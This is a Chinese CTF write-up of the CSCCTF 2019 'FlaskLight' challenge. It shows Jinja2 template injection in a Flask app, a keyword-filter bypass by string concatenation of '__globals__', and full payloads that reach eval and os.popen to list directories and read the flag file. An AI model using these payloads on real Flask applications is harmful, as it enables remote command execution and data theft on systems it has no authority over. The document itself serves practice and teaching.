[CSCCTF 2019 Qual]FlaskLight——直取flag？

[CSCCTF 2019 Qual]FlaskLight

前言

白天一直在上课，晚上赶快躲进图书馆里面打打靶场。这次的题目算是很简单的一道题目了，我做完之后还去看了看其他师傅写的博客，只能感叹一声太强了。我根本就没有考虑这些，就直接去找flag了。

正文

很喜欢这样的题目，在每一步之后出题人都会贴心的留下下一步的线索，不至于做完第一步后，不知道自己在干嘛，甚至是不知道自己第一步做对了没有。打开题目

出题人让我们用get进行传参，向这个网站里面传一个search进去。我们尝试之后发现这个地方存在SSTI。

因为是用flask搭建的网站，所以这里的判断很自然就是jinja2的模板注入。
我们用如下的方式来测试一下python的版本

[].__class__.__mro__[-1].__subclasses__()[40]

这里给到我们的信息是该python版本是python2，因为在python3中subclasses()里面是没有type file的。emm，不知道该干嘛了，先去看一下环境变量吧。直接{{config}}(惊了，居然能成功)

说实话，config这玩意我是不指望着他能成功的，但是没想到这道题连这个都没过滤。我们看到了出题人给我们的提示，他说flag就在当前的目录下面，也就是说flag与工程文件同处一个文件夹下。
在这里我尝试了很久，服务器总是给我报500的响应码，我推测是有过滤。然后在我一个一个删除关键字后，我发现这道题过滤的是globals。那用字符串拼接过滤试试看

这里发现服务器已经可以正常地给我返回信息了，所以说题目里面的waf我们应该是已经绕过去了。
接下来我们用如下payload

{{[].__class__.__bases__[0].__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__(%27os%27).popen(%27dir%27).read()")}}

我们直接进入工程文件下面列目录

{{[].__class__.__bases__[0].__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__(%27os%27).popen(%27ls /flasklight%27).read()")}}

最后cat一下里面的coomme_geeeett_youur_flek

{{[].__class__.__bases__[0].__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__(%27os%27).popen(%27cat /flasklight/coomme_geeeett_youur_flek%27).read()")}}

后记

看了其他师傅的文章，有些师傅是通过subprocess.Popen来实现命令执行的，又是一个新姿势。个人感觉这道题还是挺简单的，每条路都能走通，甚至可以不用内建函数__builtins__都行，可以用global里面的os进行RCE。